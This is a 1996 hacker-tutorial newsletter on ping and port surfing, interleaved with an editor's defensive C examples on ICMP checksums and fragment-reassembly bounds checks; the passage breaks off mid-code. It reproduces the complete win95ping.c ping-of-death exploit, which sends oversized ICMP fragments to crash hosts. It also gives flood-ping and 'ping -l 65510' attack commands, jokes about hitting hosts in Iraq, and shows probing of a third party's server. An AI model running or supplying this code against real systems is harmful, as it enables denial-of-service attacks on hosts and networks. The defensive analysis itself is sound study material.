Ping is a command you can give, for example, from the Unix, Windows 95 and Windows NT operating systems. It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP networks. What it does is tell a remote computer to echo back a ping. So if you get your ping back, you know that computer is alive. Furthermore, some forms of the ping command will also tell you how long it takes for a message to go out to that computer and come back again.

But how does your computer know that the ping it just sent out actually echoed back from the targeted computer? The datagram is the answer. The ping sent out a datagram. If the returning ping holds this same datagram, you know it was your ping that just echoed back. More precisely, the echo reply carries back the identifier, sequence number and data bytes of the request, so the sender can match each reply to the request it sent.

The basic format of this command is simply:

ping hostname

where "hostname" is the Internet address of the computer you want to check out. When I give this command from Sun Release 4.1 Unix, I get the answer "hostname is alive."
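How a ping tells its own echo apart from someone else's, shown as an added example (editor's code, not from the Guide): it builds an ICMP echo request with the same header layout the ping program uses, computes the RFC 1071 checksum, simulates the reply the target sends back, and then applies the checks the pinging side makes before it reports "hostname is alive". The identifier 0x1234, sequence number 7 and the "abcdefgh" data are constructed sample values.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ICMP_ECHO_REQUEST 8
#define ICMP_ECHO_REPLY   0
#define ICMP_HDR_LEN      8

/* RFC 1071 Internet checksum. Summing big-endian 16-bit words byte by byte
 * keeps the result independent of host endianness; the caller stores the
 * high byte first, i.e. in network order. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)data[i] << 8) | data[i + 1];
    if (len & 1)                         /* odd trailing byte, zero padded */
        sum += (uint32_t)data[len - 1] << 8;
    while (sum >> 16)                    /* fold the carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* ICMP echo request: type 8, code 0, checksum, 16-bit identifier, 16-bit
 * sequence number, then the data. Returns bytes written, 0 if out is too small. */
size_t build_echo_request(uint8_t *out, size_t cap, uint16_t id, uint16_t seq,
                          const uint8_t *data, size_t dlen)
{
    size_t total = ICMP_HDR_LEN + dlen;
    uint16_t ck;
    if (cap < total) return 0;
    out[0] = ICMP_ECHO_REQUEST;
    out[1] = 0;
    out[2] = out[3] = 0;                 /* checksum field is zero while summing */
    out[4] = id >> 8;  out[5] = id & 0xff;
    out[6] = seq >> 8; out[7] = seq & 0xff;
    memcpy(out + ICMP_HDR_LEN, data, dlen);
    ck = inet_checksum(out, total);
    out[2] = ck >> 8; out[3] = ck & 0xff;
    return total;
}

/* What the target does: echo the request back with the type changed to
 * reply (0) and the checksum recomputed; id, seq and data come back as sent. */
size_t make_echo_reply(uint8_t *out, size_t cap, const uint8_t *req, size_t len)
{
    uint16_t ck;
    if (len < ICMP_HDR_LEN || cap < len) return 0;
    memcpy(out, req, len);
    out[0] = ICMP_ECHO_REPLY;
    out[2] = out[3] = 0;
    ck = inet_checksum(out, len);
    out[2] = ck >> 8; out[3] = ck & 0xff;
    return len;
}

/* The pinging side's checks before it says "alive": it is an echo reply,
 * the checksum verifies (summing a correct packet including its checksum
 * field gives 0xffff, so inet_checksum() returns 0), and identifier,
 * sequence and data are exactly what we sent. */
int echo_reply_matches(const uint8_t *reply, size_t rlen,
                       const uint8_t *req, size_t qlen)
{
    if (rlen != qlen || rlen < ICMP_HDR_LEN) return 0;
    if (reply[0] != ICMP_ECHO_REPLY || reply[1] != 0) return 0;
    if (inet_checksum(reply, rlen) != 0) return 0;
    return memcmp(reply + 4, req + 4, rlen - 4) == 0;
}

/* Fenner's shortcut, used by the exploit program later on this page: a
 * request whose bytes are all zero except the type has checksum
 * ~(8 << 8) = 0xf7ff, so no checksum routine is needed there. */
uint16_t zero_data_checksum(void)
{
    uint8_t hdr[ICMP_HDR_LEN] = { ICMP_ECHO_REQUEST, 0, 0, 0, 0, 0, 0, 0 };
    return inet_checksum(hdr, sizeof hdr);
}

/* Round trip over constructed sample values (id 0x1234, seq 7, "abcdefgh").
 * mode 0: reply left alone; 1: a data byte flipped; 2: sequence changed;
 * 3: checksum byte corrupted. Returns echo_reply_matches()'s verdict. */
int demo_roundtrip(int mode)
{
    const uint8_t data[] = "abcdefgh";
    uint8_t req[64], rep[64];
    size_t qlen = build_echo_request(req, sizeof req, 0x1234, 7, data, 8);
    size_t rlen = make_echo_reply(rep, sizeof rep, req, qlen);
    if (mode == 1) rep[ICMP_HDR_LEN] ^= 0x01;
    if (mode == 2) rep[7] ^= 0x01;
    if (mode == 3) rep[3] ^= 0x01;
    return echo_reply_matches(rep, rlen, req, qlen);
}

int main(void)
{
    printf("zero-data echo request checksum: 0x%04x\n", zero_data_checksum());
    printf("untouched reply: %d, tampered data: %d, tampered seq: %d, bad checksum: %d\n",
           demo_roundtrip(0), demo_roundtrip(1), demo_roundtrip(2), demo_roundtrip(3));
    return 0;
}
```

A real ping also checks that the reply's IP source is the host it sent to, and it uses the process id as the identifier so two pings on the same machine do not claim each other's replies.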

**************************************************
TECHNICAL TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping program in their shell accounts where clueless newbies can't get their hands on it. If your shell account says "command not found" when you enter the ping command, try:

/usr/etc/ping hostname

If this doesn't work, either try the command "whereis ping" or complain to your ISP's tech support. They may have disabled ping for ordinary users, but if you convince tech support you are a good Internet citizen they may let you use it.
**************************************************

**************************************************
NEWBIE NOTE: You say you can't find a way to ping from your on-line service? That may be because you don't have a shell account. But there is one thing you really need in order to hack: A SHELL ACCOUNT!!!! The reason hackers make fun of people with America Online accounts is because that ISP doesn't give out shell accounts. This is because America Online wants you to be good boys and girls and not hack! A "shell account" is an Internet account in which your computer becomes a terminal of one of your ISP's host computers. Once you are in the "shell" you can give commands to the operating system (which is usually Unix) just like you were sitting there at the console of one of your ISP's hosts.

You may already have a shell account but just not know how to log on to it. Call tech support with your ISP to find out whether you have one, and how to get on it.
**************************************************

There are all sorts of fancy variations on the ping command. And, guess what, whenever there is a command you give over the Internet that has lots of variations, you can just about count on there being something hackable in there. Muhahaha!

The flood ping is a simple example. If your operating system will let you get away with giving the command:

-> ping -f hostname

it sends out a veritable flood of pings, as fast as your ISP's host machine can make them. This keeps the host you've targeted so busy echoing back your pings that it can do little else. It also puts a heavy load on the network.

Hackers with primitive skill levels will sometimes get together and use several of their computers at once to simultaneously ping some victim's Internet host computer. This will generally keep the victim's computer too busy to do anything else. It may even crash. However, the down side (from the attackers' viewpoint) is that it keeps the attackers' computers tied up, too.

**************************************************
NETIQUETTE NOTE: Flood pinging a computer is extremely rude. Get caught doing this and you will be lucky if the worst that happens is your on-line service provider closes your account. Do this to a serious hacker and you may need an identity transplant.

If you should start a flood ping kind of by accident, you can shut it off by holding down the control key and pressing "c" (control-c).
**************************************************

**************************************************
EVIL GENIUS TIP: Ping yourself! If you are using some sort of Unix, your operating system will let you use your computer to do just about anything to itself that it can do to other computers. The network address that takes you back to your own host computer is localhost (or 127.0.0.1). Here's an example of how I use localhost:

<slug> [65] ->telnet localhost
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.

SunOS UNIX (slug)

login:

See, I'm back to the login sequence for the computer named "slug" all over again.

Now I ping myself:

<llama> [68] ->/usr/etc/ping localhost
localhost is alive

This gives the same result as if I were to command:

<llama> [69] ->/usr/etc/ping llama
llama.swcp.com is alive
**************************************************

**************************************************
MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to 127.0.0.1 and log in using his or her own user name and password for kewl warez! My ex-husband Keith Henson did that to the Church of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all their copyrighted scriptures. They assumed this was on Keith's computer, not theirs. They were *so* sure he had their scriptures that they took him to court. The judge, when he realized they were simply looping back to their own computer, literally laughed them out of court.

For a hilarious transcript or audio tape of this infamous court session, email hkhenson@cup.portal.com. That's Keith's email address. My hat is off to a superb hacker!
**************************************************

However, the oversize ping packet exploit you are about to learn will do even more damage to some hosts than a gang of flood ping conspirators. And it will do it without tying up the attackers' computer for any longer than the split second it takes to send out just one ping.

The easiest way to do this hack is to run Windows 95. Don't have it? You can generally find an El Cheapo store that will sell it to you for $99.

To do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the Internet using the Dialup Networking program under the My Computer icon. You may need some help from your ISP tech support in setting this up. You must do it this way or this hack won't work. Your America Online dialer *definitely* will not work.

**************************************************
NEWBIE NOTE: If your Internet connection allows you to run a Web browser that shows pictures, you can use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP connection.
**************************************************

Next, get yourself connected to the Internet. But don't run a browser or anything. Instead, once your Dialup Networking program tells you that you have a connection, click on the "Start" button and go to the listing "MS-DOS." Open this DOS window. You'll get a prompt:

C:\windows\>

Now let's first do this the good citizen way. At this prompt you can type in a plain ordinary "ping" command:

C:\windows\ping hostname

where "hostname" is the address of some Internet computer. For example, you could ping thales.nmia.com, which is one of my favorite computers, named after an obscure Greek philosopher.

Now if you happened to know the address of one of Saddam Hussein's computers, however, you might want to give the command:

c:\windows\ping -l 65510 saddam_hussein's.computer.mil

Now don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or reboot when they get this ping. Others will continue working cheerily along, and then suddenly go under hours later.

Why? That extra -l 65510 asks for 65510 bytes of ping data. With the 8-byte ICMP header and the 20-byte IP header that comes to 65538 bytes, more than the 65535-byte maximum an IP datagram may have, so it goes out as a train of fragments whose last piece ends past that limit. Some computers, when they reassemble those fragments, copy that last piece past the end of their reassembly buffer and get really messed up.

If you want all the gory details on this ping exploit, including how to protect your computers from it, check out http://www.sophist.demon.co.uk/ping.
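What the 65510 in that command does at the IP layer, and the check a fixed stack makes, as an added example (editor's code, not the Guide's and not any vendor's patch): it reproduces the fragment train a 1500-byte MTU produces for ping -l 65510 (45 fragments, the last one ending at byte 65518 of the payload) and shows a reassembler that refuses any fragment reaching past the 65515-byte maximum IP payload instead of copying it into a fixed-size buffer. The 1500-byte MTU and the buffer layout are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IP_MAXPACKET   65535u                      /* max IP total length */
#define IP_HDR_LEN     20u
#define IP_MAX_PAYLOAD (IP_MAXPACKET - IP_HDR_LEN) /* 65515 */
#define ICMP_HDR_LEN   8u
#define MTU_PAYLOAD    1480u   /* assumed 1500-byte MTU minus the IP header */
#define IP_MF          0x2000u /* "more fragments" flag in ip_off */
#define IP_OFFMASK     0x1fffu

struct frag { uint16_t ip_off; uint16_t ip_len; }; /* host-order header fields */

/* Byte range [start, end) this fragment claims in the reassembled payload.
 * The offset field counts 8-byte units; ip_len includes the IP header. */
uint32_t frag_start(const struct frag *f) { return (f->ip_off & IP_OFFMASK) * 8u; }
uint32_t frag_end(const struct frag *f)   { return frag_start(f) + (f->ip_len - IP_HDR_LEN); }

/* The bounds check the vulnerable stacks lacked: a fragment whose end lies
 * beyond the largest legal payload must be dropped, not copied. */
int frag_fits(const struct frag *f)
{
    if (f->ip_len < IP_HDR_LEN) return 0;
    return frag_end(f) <= IP_MAX_PAYLOAD;
}

/* Fragment train for "ping -l <data_size>": ICMP header + data, cut into
 * MTU-sized pieces. Returns the number of fragments written (at most cap). */
size_t ping_fragments(uint32_t data_size, struct frag *out, size_t cap)
{
    uint32_t payload = ICMP_HDR_LEN + data_size, off = 0;
    size_t n = 0;
    while (off < payload && n < cap) {
        uint32_t chunk = payload - off;
        if (chunk > MTU_PAYLOAD) chunk = MTU_PAYLOAD;
        out[n].ip_off = (uint16_t)(off / 8u);
        if (off + chunk < payload) out[n].ip_off |= IP_MF;
        out[n].ip_len = (uint16_t)(IP_HDR_LEN + chunk);
        off += chunk;
        n++;
    }
    return n;
}

/* Hardened reassembly into a buffer sized for the largest legal payload.
 * Returns the reassembled length, or 0 if any fragment was rejected. Without
 * frag_fits() the last fragment of -l 65510 would write 3 bytes past buf. */
uint32_t reassemble(const struct frag *frags, size_t n, uint8_t *buf, size_t bufsz)
{
    uint32_t total = 0;
    size_t i;
    if (bufsz < IP_MAX_PAYLOAD) return 0;
    for (i = 0; i < n; i++) {
        if (!frag_fits(&frags[i])) return 0;        /* drop, do not copy */
        memset(buf + frag_start(&frags[i]), 0xAA, frags[i].ip_len - IP_HDR_LEN);
        if (frag_end(&frags[i]) > total) total = frag_end(&frags[i]);
    }
    return total;
}

/* Helpers that run the whole pipeline for a given -l value. */
size_t ping_fragment_count(uint32_t data_size)
{
    struct frag f[64];
    return ping_fragments(data_size, f, 64);
}
uint32_t ping_last_fragment_end(uint32_t data_size)
{
    struct frag f[64];
    size_t n = ping_fragments(data_size, f, 64);
    return n ? frag_end(&f[n - 1]) : 0;
}
uint32_t ping_reassembled_length(uint32_t data_size)
{
    static uint8_t buf[IP_MAX_PAYLOAD];
    struct frag f[64];
    size_t n = ping_fragments(data_size, f, 64);
    return reassemble(f, n, buf, sizeof buf);
}

int main(void)
{
    uint32_t sizes[] = { 56, 65507, 65510 };
    size_t i;
    for (i = 0; i < 3; i++)
        printf("ping -l %5u: %2zu fragments, last ends at %u, reassembled %u bytes\n",
               sizes[i], ping_fragment_count(sizes[i]), ping_last_fragment_end(sizes[i]),
               ping_reassembled_length(sizes[i]));
    return 0;
}
```

65507 is the largest data size that still fits (65507 + 8 + 20 = 65535), which is why a sane ping refuses anything bigger; the reassembler's check is what protects a host from peers that do not.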

Now there are other ways to manufacture a giant ping datagram besides using Windows 95. For example, if you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted to the Bugtraq list.

From: Bill Fenner <fenner@freefall.freebsd.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Subject: Ping exploit program

Since some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following exploit program. It requires a raw socket layer that doesn't mess with the packet, so BSD 4.3, SunOS and Solaris are out. It works fine on 4.4BSD systems. It should work on Linux if you compile with -DREALLY_RAW.

Feel free to do with this what you want. Please use this tool only to test your own machines, and not to crash others'.

/*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum).  That means that SunOS, Solaris, and
 * BSD4.3-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
 */
#include <stdio.h>
#include <stdlib.h>             /* added: exit()                         */
#include <strings.h>            /* added: bzero(), bcopy()               */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>          /* added: inet_addr(), inet_ntoa()       */
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 */
#ifdef REALLY_RAW
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

int
main(int argc, char **argv)
{
	int s;
	char buf[1500];                 /* one MTU-sized fragment: 20-byte IP header + 1480 data */
	struct ip *ip = (struct ip *)buf;
	struct icmp *icmp = (struct icmp *)(ip + 1);
	struct hostent *hp;
	struct sockaddr_in dst;
	int offset;
	int on = 1;

	bzero(buf, sizeof buf);

	/* raw IP socket; IP_HDRINCL means we supply the IP header ourselves */
	if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
		perror("socket");
		exit(1);
	}
	if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
		perror("IP_HDRINCL");
		exit(1);
	}
	if (argc != 2) {
		fprintf(stderr, "usage: %s hostname\n", argv[0]);
		exit(1);
	}
	if ((hp = gethostbyname(argv[1])) == NULL) {
		if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
			fprintf(stderr, "%s: unknown host\n", argv[1]);
		}
	} else {
		bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
	}
	printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
	ip->ip_v = 4;
	ip->ip_hl = sizeof *ip >> 2;
	ip->ip_tos = 0;
	ip->ip_len = FIX(sizeof buf);
	ip->ip_id = htons(4321);        /* every fragment carries the same id */
	ip->ip_off = FIX(0);
	ip->ip_ttl = 255;
	ip->ip_p = 1;                   /* ICMP */
	ip->ip_sum = 0;                 /* kernel fills in */
	ip->ip_src.s_addr = 0;          /* kernel fills in */

	dst.sin_addr = ip->ip_dst;
	dst.sin_family = AF_INET;

	icmp->icmp_type = ICMP_ECHO;
	icmp->icmp_code = 0;
	icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
		/* the checksum of all 0's is easy to compute */

	/* 45 fragments: 44 of 1480 data bytes, then 398 bytes at offset 65120,
	 * so the reassembled datagram would be 65538 bytes, 3 over the limit */
	for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
		ip->ip_off = FIX(offset >> 3);
		if (offset < 65120)
			ip->ip_off |= FIX(IP_MF);
		else
			ip->ip_len = FIX(418);  /* make total 65538 */
		if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
					sizeof dst) < 0) {
			fprintf(stderr, "offset %d: ", offset);
			perror("sendto");
		}
		if (offset == 0) {
			/* only the first fragment carries the ICMP header */
			icmp->icmp_type = 0;
			icmp->icmp_code = 0;
			icmp->icmp_cksum = 0;
		}
	}
	return 0;
}

(End of Fenner's ping exploit message.)

**************************************************
YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if you are reading this you don't know enough to keep from getting busted from doing this ping hack. On the other hand, if you were to do it to an Internet host in Iraq...
**************************************************

Of course there are many other kewl things you can do with ping. If you have a shell account, you can find out lots of stuph about ping by giving the command:

man ping

In fact, you can get lots of details on any Unix command with "man." Have fun with ping -- and be good! But remember, I'm not begging the evil genius wannabes to be good. See if I care when you get busted...

To subscribe, email hacker@techbroker.com with message "subscribe hh." To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!

Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.

GUIDE TO (mostly) HARMLESS HACKING Vol. 2 Number 4

More intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and without breaking the law. Impress your clueless friends and actually discover kewl, legal, safe stuph.

A few days ago I had a lady friend visiting. She's 42 and doesn't own a computer. However, she is taking a class on personal computers at a community college. She wanted to know what all this hacking stuph is about. So I decided to introduce her to port surfing. And while doing it, we stumbled across something kewl.

Port surfing takes advantage of the structure of TCP/IP. This is the protocol (set of rules) used for computers to talk to each other over the Internet. One of the basic principles of Unix (the most popular operating system on the Internet) is to assign a "port" to every function that one computer might command another to perform. Common examples are to send and receive email, read Usenet newsgroups, telnet, transfer files, and offer Web pages.

**************************************************
Newbie note #1: A computer port is a place where information goes in or out of it. On your home computer, examples of ports are your monitor, which sends information out, your keyboard and mouse, which send information in, and your modem, which sends information both out and in.

But an Internet host computer such as callisto.unm.edu has many more ports than a typical home computer. These ports are identified by numbers. Now these are not all physical ports, like a keyboard or RS232 serial port (for your modem). They are virtual (software) ports.

A "service" is a program running on a "port." When you telnet to a port, that program is up and running, just waiting for your input. Happy hacking!
**************************************************

So if you want to read a Web page, your browser contacts port number 80 and tells the computer that manages that Web site to let you in. And, sure enough, you get into that Web server computer without a password.

OK, big deal. That's pretty standard for the Internet. Many -- most -- computers on the Internet will let you do some things with them without needing a password. However, the essence of hacking is doing things that aren't obvious. That don't just jump out at you from the manuals. One way you can move a step up from the run of the mill computer user is to learn how to port surf.

The essence of port surfing is to pick out a target computer and explore it to see what ports are open and what you can do with them.

Now if you are a lazy hacker you can use canned hacker tools such as Satan or Netcat. These are programs you can run from Linux, FreeBSD or Solaris (all types of Unix) from your PC. They automatically scan your target computers. They will tell you what ports are in use. They will also probe these ports for presence of daemons with known security flaws, and tell you what they are.

**************************************************
Newbie note #2: A daemon is not some sort of grinch or gremlin or 666 guy. It is a program that runs in the background on many (but not all) Unix system ports. It waits for you to come along and use it. If you find a daemon on a port, it's probably hackable. Some hacker tools will tell you what the hackable features are of the daemons they detect.
**************************************************

However, there are several reasons to surf ports by hand instead of automatically.

1) You will learn something. Probing manually you get a gut feel for how the daemon running on that port behaves. It's the difference between watching an x-rated movie and (blush)

2) You can impress your friends. If you run a canned hacker tool like Satan your friends will look at you and say, "Big deal. I can run programs, too." They will immediately catch on to the dirty little secret of the hacker world. Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site. But if you enter commands keystroke by keystroke they will see you using your brain. And you can help them play with daemons, too, and give them a giant rush.

3) The truly elite hackers surf ports and play with daemons by hand because it is the only way to discover something new. There are only a few hundred hackers -- at most -- who discover new stuph. The rest just run canned exploits over and over and over again. Boring. But I am teaching you how to reach the pinnacle of hackerdom.

Now let me tell you what my middle aged friend and I discovered just messing around. First, we decided we didn't want to waste our time messing with some minor little host computer. Hey, let's go for the big time!
So how do you find a big kahuna computer on the Internet? We started with a domain which consisted of a LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet Access ISP: nmia.com.

**************************************************
Newbie Note #3: A domain is an Internet address. You can use it to look up who runs the computers used by the domain, and also to look up how that domain is connected to the rest of the Internet.
**************************************************

So to do this we first logged into my shell account with Southwest Cyberport. I gave the command:

<slug> [66] ->whois nmia.com
New Mexico Internet Access (NMIA-DOM)
   2201 Buena Vista SE
   Albuquerque, NM 87106

   Domain Name: NMIA.COM

   Administrative Contact, Technical Contact, Zone Contact:
      Orrell, Stan  (SO11)  SAO@NMIA.COM
      (505) 877-0617

   Record last updated on 11-Mar-94.
   Record created on 11-Mar-94.

   Domain servers in listed order:

   NS.NMIA.COM            198.59.166.10
   GRANDE.NM.ORG          129.121.1.2

Now it's a good bet that grande.nm.org is serving a lot of other Internet hosts beside nmia.com. Here's how we port surf our way to find this out:

<slug> [67] ->telnet grande.nm.org 15
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.

TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1

 Product         License  Authorization   Expiration Date
 --------------  -------  -------------   ---------------
 MULTINET        Yes      A-137-1641      (none)
 NFS-CLIENT      Yes      A-137-113237    (none)

*** Configuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATION" ***

 Device  Adapter                        CSR Address  Flags/Vector
 ------  -------                        -----------  ------------
 se0     (Shared VMS Ethernet/FDDI)     -NONE-       -NONE-  -NONE-

MultiNet Active Connections, including servers:

Proto Rcv-Q Snd-Q  Local Address (Port)       Foreign Address (Port)     State
----- ----- -----  ------------------------   ------------------------   -----
TCP       0   822  GRANDE.NM.ORG(NETSTAT)     198.59.115.24(1569)        ESTABLISHED
TCP       0     0  GRANDE.NM.ORG(POP3)        164.64.201.67(1256)        ESTABLISHED
TCP       0     0  GRANDE.NM.ORG(4918)        129.121.254.5(TELNET)      ESTABLISHED
TCP       0     0  GRANDE.NM.ORG(TELNET)      AVATAR.NM.ORG(3141)        ESTABLISHED
TCP       0     0  *(NAMESERVICE)             *(*)                       LISTEN
TCP       0     0  *(TELNET)                  *(*)                       LISTEN
TCP       0     0  *(FTP)                     *(*)                       LISTEN
TCP       0     0  *(FINGER)                  *(*)                       LISTEN
TCP       0     0  *(NETSTAT)                 *(*)                       LISTEN
TCP       0     0  *(SMTP)                    *(*)                       LISTEN
TCP       0     0  *(LOGIN)                   *(*)                       LISTEN
TCP       0     0  *(SHELL)                   *(*)                       LISTEN
TCP       0     0  *(EXEC)                    *(*)                       LISTEN
TCP       0     0  *(RPC)                     *(*)                       LISTEN
TCP       0     0  *(NETCONTROL)              *(*)                       LISTEN
TCP       0     0  *(SYSTAT)                  *(*)                       LISTEN
TCP       0     0  *(CHARGEN)                 *(*)                       LISTEN
TCP       0     0  *(DAYTIME)                 *(*)                       LISTEN
TCP       0     0  *(TIME)                    *(*)                       LISTEN
TCP       0     0  *(ECHO)                    *(*)                       LISTEN
TCP       0     0  *(DISCARD)                 *(*)                       LISTEN
TCP       0     0  *(PRINTER)                 *(*)                       LISTEN
TCP       0     0  *(POP2)                    *(*)                       LISTEN
TCP       0     0  *(POP3)                    *(*)                       LISTEN
TCP       0     0  *(KERBEROS_MASTER)         *(*)                       LISTEN
TCP       0     0  *(KLOGIN)                  *(*)                       LISTEN
TCP       0     0  *(KSHELL)                  *(*)                       LISTEN
TCP       0     0  GRANDE.NM.ORG(4174)        OSO.NM.ORG(X11)            ESTABLISHED
TCP       0     0  GRANDE.NM.ORG(4172)        OSO.NM.ORG(X11)            ESTABLISHED
TCP       0     0  GRANDE.NM.ORG(4171)        OSO.NM.ORG(X11)            ESTABLISHED
TCP       0     0  *(FS)                      *(*)                       LISTEN
UDP       0     0  *(NAMESERVICE)             *(*)
UDP       0     0  127.0.0.1(NAMESERVICE)     *(*)
UDP       0     0  GRANDE.NM.OR(NAMESERV)     *(*)
UDP       0     0  *(TFTP)                    *(*)
UDP       0     0  *(BOOTPS)                  *(*)
UDP       0     0  *(KERBEROS)                *(*)
UDP       0     0  127.0.0.1(KERBEROS)        *(*)
UDP       0     0  GRANDE.NM.OR(KERBEROS)     *(*)
UDP       0     0  *(*)                       *(*)
UDP       0     0  *(SNMP)                    *(*)
UDP       0     0  *(RPC)                     *(*)
UDP       0     0  *(DAYTIME)                 *(*)
UDP       0     0  *(ECHO)                    *(*)
UDP       0     0  *(DISCARD)                 *(*)
UDP       0     0  *(TIME)                    *(*)
UDP       0     0  *(CHARGEN)                 *(*)
UDP       0     0  *(TALK)                    *(*)
UDP       0     0  *(NTALK)                   *(*)
UDP       0     0  *(1023)                    *(*)
UDP       0     0  *(XDMCP)                   *(*)

MultiNet registered RPC programs:

 Program  Version  Protocol  Port
 -------  -------  --------  ----
 PORTMAP  2        TCP       111
 PORTMAP  2        UDP       111

MultiNet IP Routing tables:
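What a defender pulls out of a listing like that, as an added example (editor's code, not from the Guide): a parser for the MultiNet netstat line format above that collects every socket waiting for callers and flags the services a reviewer would want shut off on a multi-user host. The sample is a constructed subset of the lines above, and the list of risky services is the editor's choice, not anything the page states.

```c
#include <stdio.h>
#include <string.h>

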